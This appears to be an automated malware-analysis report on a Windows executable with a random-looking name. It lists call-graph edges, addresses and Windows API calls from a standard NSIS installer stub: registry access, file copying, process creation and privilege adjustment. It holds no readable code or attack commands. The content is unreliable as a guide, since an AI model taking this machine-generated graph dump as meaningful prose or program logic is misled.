2855->2852 2856 406261 CharNextA 2855->2856 2857 40626e CharNextA 2855->2857 2866 405963 2855->2866 2856->2855 2857->2852 2859 405e26 RegOpenKeyExA 2858->2859 2860 405eb4 2859->2860 2861 405ebb RegQueryValueExA RegCloseKey 2860->2861 2862 405eea 2860->2862 2861->2862 2862->2844 2863->2844 2864->2844 2865->2834 2867 405969 2866->2867 2868 40597c 2867->2868 2869 40596f CharNextA 2867->2869 2868->2855 2869->2867 2871 405e26 RegOpenKeyExA 2870->2871 2872 402bfb 2871->2872 2873 402c75 2872->2873 2874 402bff 2872->2874 2873->2825 2875 402c21 RegEnumKeyA 2874->2875 2876 402c38 RegCloseKey 2874->2876 2878 402c59 RegCloseKey 2874->2878 2880 402bcd 6 API calls 2874->2880 2875->2874 2875->2876 2883 406338 GetModuleHandleA 2876->2883 2878->2873 2880->2874 2881 402c69 RegDeleteKeyA 2881->2873 2882 402c4c 2882->2873 2884 406354 2883->2884 2885 40635e GetProcAddress 2883->2885 2889 4062ca GetSystemDirectoryA 2884->2889 2887 402c48 2885->2887 2887->2881 2887->2882 2888 40635a 2888->2885 2888->2887 2890 4062ec wsprintfA LoadLibraryExA 2889->2890 2890->2888 3998 401502 3999 40150a 3998->3999 4001 40151d 3998->4001 4000 402aa9 17 API calls 3999->4000 4000->4001 4002 402003 4003 402015 4002->4003 4004 4020c3 4002->4004 4005 402acb 17 API calls 4003->4005 4006 401423 24 API calls 4004->4006 4007 40201c 4005->4007 4013 402242 4006->4013 4008 402acb 17 API calls 4007->4008 4009 402025 4008->4009 4010 40203a LoadLibraryExA 4009->4010 4011 40202d GetModuleHandleA 4009->4011 4010->4004 4012 40204a GetProcAddress 4010->4012 4011->4010 4011->4012 4014 402096 4012->4014 4015 402059 4012->4015 4016 4050c7 24 API calls 4014->4016 4017 401423 24 API calls 4015->4017 4018 402069 4015->4018 4016->4018 4017->4018 4018->4013 4019 4020b7 FreeLibrary 4018->4019 4019->4013 4020 402583 4021 402588 4020->4021 4022 40259c 4020->4022 4023 402aa9 17 API calls 4021->4023 4024 402acb 17 API calls 4022->4024 4026 402591 4023->4026 4025 4025a3 lstrlenA 4024->4025 4025->4026 4027 405be0 WriteFile 4026->4027 4028 4025c5 4026->4028 4027->4028 2907 405205 2908 4053b0 2907->2908 2909 405227 GetDlgItem GetDlgItem GetDlgItem 2907->2909 2910 4053e0 2908->2910 2911 4053b8 GetDlgItem CreateThread CloseHandle 2908->2911 2952 404074 SendMessageA 2909->2952 2914 40540e 2910->2914 2915 4053f6 ShowWindow ShowWindow 2910->2915 2916 40542f 2910->2916 2911->2910 2986 405199 OleInitialize 2911->2986 2913 405297 2918 40529e GetClientRect GetSystemMetrics SendMessageA SendMessageA 2913->2918 2917 405469 2914->2917 2920 405442 ShowWindow 2914->2920 2921 40541e 2914->2921 2957 404074 SendMessageA 2915->2957 2961 4040a6 2916->2961 2917->2916 2925 405476 SendMessageA 2917->2925 2923 4052f0 SendMessageA SendMessageA 2918->2923 2924 40530c 2918->2924 2928 405462 2920->2928 2929 405454 2920->2929 2958 404018 2921->2958 2923->2924 2931 405311 SendMessageA 2924->2931 2932 40531f 2924->2932 2927 40543b 2925->2927 2933 40548f CreatePopupMenu 2925->2933 2930 404018 SendMessageA 2928->2930 2975 4050c7 2929->2975 2930->2917 2931->2932 2953 40403f 2932->2953 2935 405fc2 17 API calls 2933->2935 2937 40549f AppendMenuA 2935->2937 2939 4054d0 TrackPopupMenu 2937->2939 2940 4054bd GetWindowRect 2937->2940 2938 40532f 2941 405338 ShowWindow 2938->2941 2942 40536c GetDlgItem SendMessageA 2938->2942 2939->2927 2943 4054ec 2939->2943 2940->2939 2944 40535b 2941->2944 2945 40534e ShowWindow 2941->2945 2942->2927 2946 405393 SendMessageA SendMessageA 2942->2946 2947 40550b SendMessageA 2943->2947 2956 404074 SendMessageA 2944->2956 2945->2944 2946->2927 2947->2947 2948 405528 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2947->2948 2950 40554a SendMessageA 2948->2950 2950->2950 2951 40556c GlobalUnlock SetClipboardData CloseClipboard 2950->2951 2951->2927 2952->2913 2954 405fc2 17 API calls 2953->2954 2955 40404a SetDlgItemTextA 2954->2955 2955->2938 2956->2942 2957->2914 2959 404025 SendMessageA 2958->2959 2960 40401f 2958->2960 2959->2916 2960->2959 2962 404169 2961->2962 2963 4040be GetWindowLongA 2961->2963 2962->2927 2963->2962 2964 4040d3 2963->2964 2964->2962 2965 404100 GetSysColor 2964->2965 2966 404103 2964->2966 2965->2966 2967 404113 SetBkMode 2966->2967 2968 404109 SetTextColor 2966->2968 2969 404131 2967->2969 2970 40412b GetSysColor 2967->2970 2968->2967 2971 404138 SetBkColor 2969->2971 2972 404142 2969->2972 2970->2969 2971->2972 2972->2962 2973 404155 DeleteObject 2972->2973 2974 40415c CreateBrushIndirect 2972->2974 2973->2974 2974->2962 2976 4050e2 2975->2976 2985 405185 2975->2985 2977 4050ff lstrlenA 2976->2977 2978 405fc2 17 API calls 2976->2978 2979 405128 2977->2979 2980 40510d lstrlenA 2977->2980 2978->2977 2981 40513b 2979->2981 2982 40512e SetWindowTextA 2979->2982 2983 40511f lstrcatA 2980->2983 2980->2985 2984 405141 SendMessageA SendMessageA SendMessageA 2981->2984 2981->2985 2982->2981 2983->2979 2984->2985 2985->2928 2993 40408b 2986->2993 2988 4051bc 2992 4051e3 2988->2992 2996 401389 2988->2996 2989 40408b SendMessageA 2990 4051f5 CoUninitialize 2989->2990 2992->2989 2994 4040a3 2993->2994 2995 404094 SendMessageA 2993->2995 2994->2988 2995->2994 2998 401390 2996->2998 2997 4013fe 2997->2988 2998->2997 2999 4013cb MulDiv SendMessageA 2998->2999 2999->2998 4029 402688 4030 402904 4029->4030 4031 40268f 4029->4031 4032 402aa9 17 API calls 4031->4032 4033 402696 4032->4033 4034 4026a5 SetFilePointer 4033->4034 4034->4030 4035 4026b5 4034->4035 4037 405efe wsprintfA 4035->4037 4037->4030 4038 401c0a 4039 402aa9 17 API calls 4038->4039 4040 401c11 4039->4040 4041 402aa9 17 API calls 4040->4041 4042 401c1e 4041->4042 4043 401c33 4042->4043 4044 402acb 17 API calls 4042->4044 4045 402acb 17 API calls 4043->4045 4049 401c43 4043->4049 4044->4043 4045->4049 4046 401c9a 4048 402acb 17 API calls 4046->4048 4047 401c4e 4050 402aa9 17 API calls 4047->4050 4051 401c9f 4048->4051 4049->4046 4049->4047 4052 401c53 4050->4052 4053 402acb 17 API calls 4051->4053 4054 402aa9 17 API calls 4052->4054 4055 401ca8 FindWindowExA 4053->4055 4056 401c5f 4054->4056 4059 401cc6 4055->4059 4057 401c8a SendMessageA 4056->4057 4058 401c6c SendMessageTimeoutA 4056->4058 4057->4059 4058->4059 4060 40448a 4061 4044c0 4060->4061 4062 40449a 4060->4062 4064 4040a6 8 API calls 4061->4064 4063 40403f 18 API calls 4062->4063 4065 4044a7 SetDlgItemTextA 4063->4065 4066 4044cc 4064->4066 4065->4061 3246 40320c SetErrorMode GetVersion 3247 40324d 3246->3247 3248 403253 3246->3248 3249 406338 5 API calls 3247->3249 3250 4062ca 3 API calls 3248->3250 3249->3248 3251 403269 lstrlenA 3250->3251 3251->3248 3252 403278 3251->3252 3253 406338 5 API calls 3252->3253 3254 40327f 3253->3254 3255 406338 5 API calls 3254->3255 3256 403286 3255->3256 3257 406338 5 API calls 3256->3257 3258 403292 #17 OleInitialize SHGetFileInfoA 3257->3258 3336 405fa0 lstrcpynA 3258->3336 3261 4032de GetCommandLineA 3337 405fa0 lstrcpynA 3261->3337 3263 4032f0 3264 405963 CharNextA 3263->3264 3265 403319 CharNextA 3264->3265 3271 403329 3265->3271 3266 4033f3 3267 403406 GetTempPathA 3266->3267 3338 4031db 3267->3338 3269 40341e 3272 403422 GetWindowsDirectoryA lstrcatA 3269->3272 3273 403478 DeleteFileA 3269->3273 3270 405963 CharNextA 3270->3271 3271->3266 3271->3270 3276 4033f5 3271->3276 3275 4031db 12 API calls 3272->3275 3348 402d63 GetTickCount GetModuleFileNameA 3273->3348 3278 40343e 3275->3278 3440 405fa0 lstrcpynA 3276->3440 3277 40348c 3279 403522 3277->3279 3283 403512 3277->3283 3287 405963 CharNextA 3277->3287 3278->3273 3281 403442 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3278->3281 3457 4036f4 3279->3457 3282 4031db 12 API calls 3281->3282 3285 403470 3282->3285 3376 4037ce 3283->3376 3285->3273 3285->3279 3289 4034a7 3287->3289 3298 403552 3289->3298 3299 4034ed 3289->3299 3290 40365a 3292 403662 GetCurrentProcess OpenProcessToken 3290->3292 3293 4036dc ExitProcess 3290->3293 3291 40353c 3294 4056bc MessageBoxIndirectA 3291->3294 3295 4036ad 3292->3295 3296 40367d LookupPrivilegeValueA AdjustTokenPrivileges 3292->3296 3300 40354a ExitProcess 3294->3300 3301 406338 5 API calls 3295->3301 3296->3295 3303 405627 5 API calls 3298->3303 3441 405a26 3299->3441 3305 4036b4 3301->3305 3304 403557 lstrcatA 3303->3304 3307 403573 lstrcatA lstrcmpiA 3304->3307 3308 403568 lstrcatA 3304->3308 3309 4036c9 ExitWindowsEx 3305->3309 3312 4036d5 3305->3312 3307->3279 3311 40358f 3307->3311 3308->3307 3309->3293 3309->3312 3314 403594 3311->3314 3315 40359b 3311->3315 3316 40140b 2 API calls 3312->3316 3313 403507 3456 405fa0 lstrcpynA 3313->3456 3318 40558d 4 API calls 3314->3318 3319 40560a 2 API calls 3315->3319 3316->3293 3320 403599 3318->3320 3321 4035a0 SetCurrentDirectoryA 3319->3321 3320->3321 3322 4035ba 3321->3322 3323 4035af 3321->3323 3432 405fa0 lstrcpynA 3322->3432 3464 405fa0 lstrcpynA 3323->3464 3326 405fc2 17 API calls 3327 4035f9 DeleteFileA 3326->3327 3328 403606 CopyFileA 3327->3328 3333 4035c8 3327->3333 3328->3333 3329 40364e 3331 405d7f 36 API calls 3329->3331 3331->3279 3332 405fc2 17 API calls 3332->3333 3333->3326 3333->3329 3333->3332 3335 40363a CloseHandle 3333->3335 3433 405d7f MoveFileExA 3333->3433 3437 40563f CreateProcessA 3333->3437 3335->3333 3336->3261 3337->3263 3339 40620a 5 API calls 3338->3339 3341 4031e7 3339->3341 3340 4031f1 3340->3269 3341->3340 3342 405938 3 API calls 3341->3342 3343 4031f9 3342->3343 3344 40560a 2 API calls 3343->3344 3345 4031ff 3344->3345 3465 405b68 3345->3465 3469 405b39 GetFileAttributesA CreateFileA 3348->3469 3350 402da3 3369 402db3 3350->3369 3470 405fa0 lstrcpynA 3350->3470 3352 402dc9 3471 40597f lstrlenA 3352->3471 3356 402dda GetFileSize 3357 402ed6 3356->3357 3371 402df1 3356->3371 3476 402cff 3357->3476 3359 402edf 3361 402f0f GlobalAlloc 3359->3361 3359->3369 3488 4031c4 SetFilePointer 3359->3488 3360 4031ae ReadFile 3360->3371 3487 4031c4 SetFilePointer 3361->3487 3363 402f42 3366 402cff 6 API calls 3363->3366 3365 402f2a 3368 402f9c 31 API calls 3365->3368 3366->3369 3367 402ef8 3370 4031ae ReadFile 3367->3370 3374 402f36 3368->3374 3369->3277 3372 402f03 3370->3372 3371->3357 3371->3360 3371->3363 3371->3369 3373 402cff 6 API calls 3371->3373 3372->3361 3372->3369 3373->3371 3374->3369 3374->3374 3375 402f73 SetFilePointer 3374->3375 3375->3369 3377 406338 5 API calls 3376->3377 3378 4037e2 3377->3378 3379 4037e8 3378->3379 3380 4037fa 3378->3380 3501 405efe wsprintfA 3379->3501 3381 405e87 3 API calls 3380->3381 3382 403825 3381->3382 3384 403843 lstrcatA 3382->3384 3386 405e87 3 API calls 3382->3386 3385 4037f8 3384->3385 3493 403a93 3385->3493 3386->3384 3389 405a26 18 API calls 3390 403875 3389->3390 3391 4038fe 3390->3391 3393 405e87 3 API calls 3390->3393 3392 405a26 18 API calls 3391->3392 3394 403904 3392->3394 3395 4038a1 3393->3395 3396 403914 LoadImageA 3394->3396 3397 405fc2 17 API calls 3394->3397 3395->3391 3400 4038bd lstrlenA 3395->3400 3403 405963 CharNextA 3395->3403 3398 4039ba 3396->3398 3399 40393b RegisterClassA 3396->3399 3397->3396 3402 40140b 2 API calls 3398->3402 3401 403971 SystemParametersInfoA CreateWindowExA 3399->3401 3431 4039c4 3399->3431 3404 4038f1 3400->3404 3405 4038cb lstrcmpiA 3400->3405 3401->3398 3406 4039c0 3402->3406 3408 4038bb 3403->3408 3407 405938 3 API calls 3404->3407 3405->3404 3409 4038db GetFileAttributesA 3405->3409 3410 403a93 18 API calls 3406->3410 3406->3431 3411 4038f7 3407->3411 3408->3400 3412 4038e7 3409->3412 3413 4039d1 3410->3413 3502 405fa0 lstrcpynA 3411->3502 3412->3404 3415 40597f 2 API calls 3412->3415 3416 403a60 3413->3416 3417 4039dd ShowWindow 3413->3417 3415->3404 3419 405199 5 API calls 3416->3419 3418 4062ca 3 API calls 3417->3418 3421 4039f5 3418->3421 3420 403a66 3419->3420 3422 403a82 3420->3422 3423 403a6a 3420->3423 3424 403a03 GetClassInfoA 3421->3424 3426 4062ca 3 API calls 3421->3426 3425 40140b 2 API calls 3422->3425 3429 40140b 2 API calls 3423->3429 3423->3431 3427 403a17 GetClassInfoA RegisterClassA 3424->3427 3428 403a2d DialogBoxParamA 3424->3428 3425->3431 3426->3424 3427->3428 3430 40140b 2 API calls 3428->3430 3429->3431 3430->3431 3431->3279 3432->3333 3434 405da0 3433->3434 3435 405d93 3433->3435 3434->3333 3504 405c0f 3435->3504 3438 405672 CloseHandle 3437->3438 3439 40567e 3437->3439 3438->3439 3439->3333 3440->3267 3538 405fa0 lstrcpynA 3441->3538 3443 405a37 3444 4059d1 4 API calls 3443->3444 3445 405a3d 3444->3445 3446 4034f8 3445->3446 3447 40620a 5 API calls 3445->3447 3446->3279 3455 405fa0 lstrcpynA 3446->3455 3453 405a4d 3447->3453 3448 405a78 lstrlenA 3449 405a83 3448->3449 3448->3453 3451 405938 3 API calls 3449->3451 3450 4062a3 2 API calls 3450->3453 3452 405a88 GetFileAttributesA 3451->3452 3452->3446 3453->3446 3453->3448 3453->3450 3454 40597f 2 API calls 3453->3454 3454->3448 3455->3313 3456->3283 3458 40370c 3457->3458 3459 4036fe CloseHandle 3457->3459 3539 403739 3458->3539 3459->3458 3464->3322 3466 405b73 GetTickCount GetTempFileNameA 3465->3466 3467 405ba0 3466->3467 3468 40320a 3466->3468 3467->3466 3467->3468 3468->3269 3469->3350 3470->3352 3472 40598c 3471->3472 3473 405991 CharPrevA 3472->3473 3474 402dcf 3472->3474 3473->3472 3473->3474 3475 405fa0 lstrcpynA 3474->3475 3475->3356 3477 402d20 3476->3477 3478 402d08 3476->3478 3479 402d30 GetTickCount 3477->3479 3480 402d28 3477->3480 3481 402d11 DestroyWindow 3478->3481 3482 402d18 3478->3482 3484 402d61 3479->3484 3485 402d3e CreateDialogParamA ShowWindow 3479->3485 3489 406374 3480->3489 3481->3482 3482->3359 3484->3359 3485->3484 3487->3365 3488->3367 3490 406391 PeekMessageA 3489->3490 3491 402d2e 3490->3491 3492 406387 DispatchMessageA 3490->3492 3491->3359 3492->3490 3494 403aa7 3493->3494 3503 405efe wsprintfA 3494->3503 3496 403b18 3497 403b4c 18 API calls 3496->3497 3499 403b1d 3497->3499 3498 403853 3498->3389 3499->3498 3500 405fc2 17 API calls 3499->3500 3500->3499 3501->3385 3502->3391 3503->3496 3505 405c35 3504->3505 3506 405c5b GetShortPathNameA 3504->3506 3531 405b39 GetFileAttributesA CreateFileA 3505->3531 3508 405c70 3506->3508 3509 405d7a 3506->3509 3508->3509 3511 405c78 wsprintfA 3508->3511 3509->3434 3510 405c3f CloseHandle GetShortPathNameA 3510->3509 3512 405c53 3510->3512 3513 405fc2 17 API calls 3511->3513 3512->3506 3512->3509 3514 405ca0 3513->3514 3532 405b39 GetFileAttributesA CreateFileA 3514->3532 3516 405cad 3516->3509 3517 405cbc GetFileSize GlobalAlloc 3516->3517 3518 405d73 CloseHandle 3517->3518 3519 405cde 3517->3519 3518->3509 3520 405bb1 ReadFile 3519->3520 3521 405ce6 3520->3521 3521->3518 3533 405a9e lstrlenA 3521->3533 3524 405d11 3526 405a9e 4 API calls 3524->3526 3525 405cfd lstrcpyA 3527 405d1f 3525->3527 3526->3527 3528 405d56 SetFilePointer 3527->3528 3529 405be0 WriteFile 3528->3529 3530 405d6c GlobalFree 3529->3530 3530->3518 3531->3510 3532->3516 3534 405adf lstrlenA 3533->3534 3535 405ab8 lstrcmpiA 3534->3535 3536 405ae7 3534->3536 3535->3536 3537 405ad6 CharNextA 3535->3537 3536->3524 3536->3525 3537->3534 3538->3443 3540 403747 3539->3540 3541 403711 3540->3541 3542 40374c FreeLibrary GlobalFree 3540->3542 3543 405768 3541->3543 3542->3541 3542->3542 3544 405a26 18 API calls 3543->3544 3545 405788 3544->3545 3546 405790 DeleteFileA 3545->3546 3547 4057a7 3545->3547 3551 40352b OleUninitialize 3546->3551 3548 4058d5 3547->3548 3580 405fa0 lstrcpynA 3547->3580 3548->3551 3554 4062a3 2 API calls 3548->3554 3550 4057cd 3552 4057e0 3550->3552 3553 4057d3 lstrcatA 3550->3553 3551->3290 3551->3291 3556 40597f 2 API calls 3552->3556 3555 4057e6 3553->3555 3557 4058f9 3554->3557 3558 4057f4 lstrcatA 3555->3558 3559 4057ff lstrlenA FindFirstFileA 3555->3559 3556->3555 3557->3551 3560 405938 3 API calls 3557->3560 3558->3559 3559->3548 3578 405823 3559->3578 3561 405903 3560->3561 3563 405720 5 API calls 3561->3563 3562 405963 CharNextA 3562->3578 3564 40590f 3563->3564 3565 405913 3564->3565 3566 405929 3564->3566 3565->3551 3571 4050c7 24 API calls 3565->3571 3567 4050c7 24 API calls 3566->3567 3567->3551 3568 4058b4 FindNextFileA 3570 4058cc FindClose 3568->3570 3568->3578 3570->3548 3572 405920 3571->3572 3573 405d7f 36 API calls 3572->3573 3573->3551 3575 405768 60 API calls 3575->3578 3576 4050c7 24 API calls 3576->3568 3577 4050c7 24 API calls 3577->3578 3578->3562 3578->3568 3578->3575 3578->3576 3578->3577 3579 405d7f 36 API calls 3578->3579 3581 405fa0 lstrcpynA 3578->3581 3582 405720 3578->3582 3579->3578 3580->3550 3581->3578 3583 405b14 2 API calls 3582->3583 3584 40572c 3583->3584 3585 405743 DeleteFileA 3584->3585 3586 40573b RemoveDirectoryA 3584->3586 3587 40574d 3584->3587 3588 405749 3585->3588 3586->3588 3587->3578 3588->3587 3589 405759 SetFileAttributesA 3588->3589 3589->3587 4067 40378c 4068 403797 4067->4068 4069 40379b 4068->4069 4070 40379e GlobalAlloc 4068->4070 4070->4069 4071 401490 4072 4050c7 24 API calls 4071->4072 4073 401497 4072->4073 4074 401d9b GetDC 4075 402aa9 17 API calls 4074->4075 4076 401dad GetDeviceCaps MulDiv ReleaseDC 4075->4076 4077 402aa9 17 API calls 4076->4077 4078 401dde 4077->4078 4079 405fc2 17 API calls 4078->4079 4080 401e1b CreateFontIndirectA 4079->4080 4081 40257d 4080->4081 4082 40149d 4083 4022e7 4082->4083 4084 4014ab PostQuitMessage 4082->4084 4084->4083 4085 40159d 4086 402acb 17 API calls 4085->4086 4087 4015a4 SetFileAttributesA 4086->4087 4088 4015b6 4087->4088 4089 401a1e 4090 402acb 17 API calls 4089->4090 4091 401a27 ExpandEnvironmentStringsA 4090->4091 4092 401a3b 4091->4092 4094 401a4e 4091->4094 4093 401a40 lstrcmpA 4092->4093 4092->4094 4093->4094 4100 40171f 4101 402acb 17 API calls 4100->4101 4102 401726 SearchPathA 4101->4102 4103 401741 4102->4103 4104 401d20 4105 402aa9 17 API calls 4104->4105 4106 401d2e SetWindowLongA 4105->4106 4107 402957 4106->4107 4108 404822 4109 404832 4108->4109 4110 40484e 4108->4110 4119 4056a0 GetDlgItemTextA 4109->4119 4112 404881 4110->4112 4113 404854 SHGetPathFromIDListA 4110->4113 4115 404864 4113->4115 4118 40486b SendMessageA 4113->4118 4114 40483f SendMessageA 4114->4110 4116 40140b 2 API calls 4115->4116 4116->4118 4118->4112 4119->4114 4120 4041aa 4121 4041c0 4120->4121 4126 4042cc 4120->4126 4124 40403f 18 API calls 4121->4124 4122 40433b 4123 404405 4122->4123 4125 404345 GetDlgItem 4122->4125 4132 4040a6 8 API calls 4123->4132 4127 404216 4124->4127 4128 4043c3 4125->4128 4129 40435b 4125->4129 4126->4122 4126->4123 4130 404310 GetDlgItem SendMessageA 4126->4130 4131 40403f 18 API calls 4127->4131 4128->4123 4135 4043d5 4128->4135 4129->4128 4134 404381 SendMessageA LoadCursorA SetCursor 4129->4134 4153 404061 KiUserCallbackDispatcher 4130->4153 4137 404223 CheckDlgButton 4131->4137 4133 404400 4132->4133 4154 40444e 4134->4154 4139 4043db SendMessageA 4135->4139 4140 4043ec 4135->4140 4151 404061 KiUserCallbackDispatcher 4137->4151 4139->4140 4140->4133 4145 4043f2 SendMessageA 4140->4145 4141 404336 4146 40442a SendMessageA 4141->4146 4143 404241 GetDlgItem 4152 404074 SendMessageA 4143->4152 4145->4133 4146->4122 4148 404257 SendMessageA 4149 404275 GetSysColor 4148->4149 4150 40427e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4148->4150 4149->4150 4150->4133 4151->4143 4152->4148 4153->4141 4157 405682 ShellExecuteExA 4154->4157 4156 4043b4 LoadCursorA SetCursor 4156->4128 4157->4156 3187 401e2b 3188 402aa9 17 API calls 3187->3188 3189 401e31 3188->3189 3190 402aa9 17 API calls 3189->3190 3191 401e3d 3190->3191 3192 401e54 EnableWindow 3191->3192 3193 401e49 ShowWindow 3191->3193 3194 402957 3192->3194 3193->3194 4158 4063ad WaitForSingleObject 4159 4063c7 4158->4159 4160 4063d9 GetExitCodeProcess 4159->4160 4161 406374 2 API calls 4159->4161 4162 4063ce WaitForSingleObject 4161->4162 4162->4159 4163 401f31 4164 402acb 17 API calls 4163->4164 4165 401f38 4164->4165 4166 4062a3 2 API calls 4165->4166 4167 401f3e 4166->4167 4168 401f50 4167->4168 4170 405efe wsprintfA 4167->4170 4170->4168 4177 402932 SendMessageA 4178 402957 4177->4178 4179 40294c InvalidateRect 4177->4179 4179->4178 4180 4014b7 4181 4014bd 4180->4181 4182 401389 2 API calls 4181->4182 4183 4014c5 4182->4183 4184 4026ba 4185 4026c0 4184->4185 4186 402957 4185->4186 4187 4026c8 FindClose 4185->4187 4187->4186 3195 4015bb 3196 402acb 17 API calls 3195->3196 3197 4015c2 3196->3197 3215 4059d1 CharNextA CharNextA 3197->3215 3199 4015ca 3200 401624 3199->3200 3202 405963 CharNextA 3199->3202 3211 4015f3 3199->3211 3212 40160c GetFileAttributesA 3199->3212 3225 405627 3199->3225 3233 40560a CreateDirectoryA 3199->3233 3201 401629 3200->3201 3204 401652 3200->3204 3221 401423 3201->3221 3202->3199 3206 401423 24 API calls 3204->3206 3213 40164a 3206->3213 3210 40163b SetCurrentDirectoryA 3210->3213 3211->3199 3228 40558d CreateDirectoryA 3211->3228 3212->3199 3216 4059ec 3215->3216 3220 4059fc 3215->3220 3218 4059f7 CharNextA 3216->3218 3216->3220 3217 405a1c 3217->3199 3218->3217 3219 405963 CharNextA 3219->3220 3220->3217 3220->3219 3222 4050c7 24 API calls 3221->3222 3223 401431 3222->3223 3224 405fa0 lstrcpynA 3223->3224 3224->3210 3226 406338 5 API calls 3225->3226 3227 40562e 3226->3227 3227->3199 3229 4055de GetLastError 3228->3229 3230 4055da 3228->3230 3229->3230 3231 4055ed SetFileSecurityA 3229->3231 3230->3211 3231->3230 3232 405603 GetLastError 3231->3232 3232->3230 3234 40561a 3233->3234 3235 40561e GetLastError 3233->3235 3234->3199 3235->3234 4188 40503b 4189 40504b 4188->4189 4190 40505f 4188->4190 4191 405051 4189->4191 4200 4050a8 4189->4200 4192 405067 IsWindowVisible 4190->4192 4196 40507e 4190->4196 4194 40408b SendMessageA 4191->4194 4195 405074 4192->4195 4192->4200 4193 4050ad CallWindowProcA 4197 40505b 4193->4197 4194->4197 4198 404992 5 API calls 4195->4198 4196->4193 4199 404a12 4 API calls 4196->4199 4198->4196 4199->4200 4200->4193 4201 4016bb 4202 402acb 17 API calls 4201->4202 4203 4016c1 GetFullPathNameA 4202->4203 4204 4016d8 4203->4204 4210 4016f9 4203->4210 4207 4062a3 2 API calls 4204->4207 4204->4210 4205 402957 4206 40170d GetShortPathNameA 4206->4205 4208 4016e9 4207->4208 4208->4210 4211 405fa0 lstrcpynA 4208->4211 4210->4205 4210->4206 4211->4210 4212 40273c 4213 402acb 17 API calls 4212->4213 4215 40274a 4213->4215 4214 402760 4216 405b14 2 API calls 4214->4216 4215->4214 4217 402acb 17 API calls 4215->4217 4218 402766 4216->4218 4217->4214 4240 405b39 GetFileAttributesA CreateFileA 4218->4240 4220 402773 4221 40281c 4220->4221 4222 40277f GlobalAlloc 4220->4222 4225 402824 DeleteFileA 4221->4225 4226 402837 4221->4226 4223 402813 CloseHandle 4222->4223 4224 402798 4222->4224 4223->4221 4241 4031c4 SetFilePointer 4224->4241 4225->4226 4228 40279e 4229 4031ae ReadFile 4228->4229 4230 4027a7 GlobalAlloc 4229->4230 4231 4027f1 4230->4231 4232 4027b7 4230->4232 4233 405be0 WriteFile 4231->4233 4234 402f9c 31 API calls 4232->4234 4235 4027fd GlobalFree 4233->4235 4239 4027c4 4234->4239 4236 402f9c 31 API calls 4235->4236 4238 402810 4236->4238 4237 4027e8 GlobalFree 4237->4231 4238->4223 4239->4237 4240->4220 4241->4228 4242 401b3f 4243 402acb 17 API calls 4242->4243 4244 401b46 4243->4244 4245 402aa9 17 API calls 4244->4245 4246 401b4f wsprintfA 4245->4246 4247 402957 4246->4247

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 40320c-40324b SetErrorMode GetVersion 1 40324d-403255 call 406338 0->1 2 40325e 0->2 1->2 7 403257 1->7 4 403263-403276 call 4062ca lstrlenA 2->4 9 403278-403294 call 406338 * 3 4->9 7->2 16 4032a5-403303 #17 OleInitialize SHGetFileInfoA call 405fa0 GetCommandLineA call 405fa0 9->16 17 403296-40329c 9->17 24 403305-40330a 16->24 25 40330f-403324 call 405963 CharNextA 16->25 17->16 21 40329e 17->21 21->16 24->25 28 4033e9-4033ed 25->28 29 4033f3 28->29 30 403329-40332c 28->30 33 403406-403420 GetTempPathA call 4031db 29->33 31 403334-40333c 30->31 32 40332e-403332 30->32 34 403344-403347 31->34 35 40333e-40333f 31->35 32->31 32->32 43 403422-403440 GetWindowsDirectoryA lstrcatA call 4031db 33->43 44 403478-403492 DeleteFileA call 402d63 33->44 37 4033d9-4033e6 call 405963 34->37 38 40334d-403351 34->38 35->34 37->28 53 4033e8 37->53 41 403353-403359 38->41 42 403369-403396 38->42 47 40335b-40335d 41->47 48 40335f 41->48 49 403398-40339e 42->49 50 4033a9-4033d7 42->50 43->44 61 403442-403472 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031db 43->61 58 403526-403536 call 4036f4 OleUninitialize 44->58 59 403498-40349e 44->59 47->42 47->48 48->42 55 4033a0-4033a2 49->55 56 4033a4 49->56 50->37 52 4033f5-403401 call 405fa0 50->52 52->33 53->28 55->50 55->56 56->50 72 40365a-403660 58->72 73 40353c-40354c call 4056bc ExitProcess 58->73 63 4034a0-4034ab call 405963 59->63 64 403516-40351d call 4037ce 59->64 61->44 61->58 76 4034e1-4034eb 63->76 77 4034ad-4034d6 63->77 70 403522 64->70 70->58 74 403662-40367b GetCurrentProcess OpenProcessToken 72->74 75 4036dc-4036e4 72->75 79 4036ad-4036bb call 406338 74->79 80 40367d-4036a7 LookupPrivilegeValueA AdjustTokenPrivileges 74->80 82 4036e6 75->82 83 4036ea-4036ee ExitProcess 75->83 84 403552-403566 call 405627 lstrcatA 76->84 85 4034ed-4034fa call 405a26 76->85 81 4034d8-4034da 77->81 97 4036c9-4036d3 ExitWindowsEx 79->97 98 4036bd-4036c7 79->98 80->79 81->76 88 4034dc-4034df 81->88 82->83 95 403573-40358d lstrcatA lstrcmpiA 84->95 96 403568-40356e lstrcatA 84->96 85->58 94 4034fc-403512 call 405fa0 * 2 85->94 88->76 88->81 94->64 95->58 100 40358f-403592 95->100 96->95 97->75 101 4036d5-4036d7 call 40140b 97->101 98->97 98->101 103 403594-403599 call 40558d 100->103 104 40359b call 40560a 100->104 101->75 112 4035a0-4035ad SetCurrentDirectoryA 103->112 104->112 113 4035ba-4035e2 call 405fa0 112->113 114 4035af-4035b5 call 405fa0 112->114 118 4035e8-403604 call 405fc2 DeleteFileA 113->118 114->113 121 403645-40364c 118->121 122 403606-403616 CopyFileA 118->122 121->118 124 40364e-403655 call 405d7f 121->124 122->121 123 403618-403631 call 405d7f call 405fc2 call 40563f 122->123 132 403636-403638 123->132 124->58 132->121 133 40363a-403641 CloseHandle 132->133 133->121
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403231
                                                  • GetVersion.KERNEL32 ref: 00403237
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
                                                  • OleInitialize.OLE32(00000000), ref: 004032AD
                                                  • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
                                                  • GetCommandLineA.KERNEL32(Agitationers Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\3lH2EWD4wU.exe",00000020,"C:\Users\user\Desktop\3lH2EWD4wU.exe",00000000,?,00000006,00000008,0000000A), ref: 0040331A
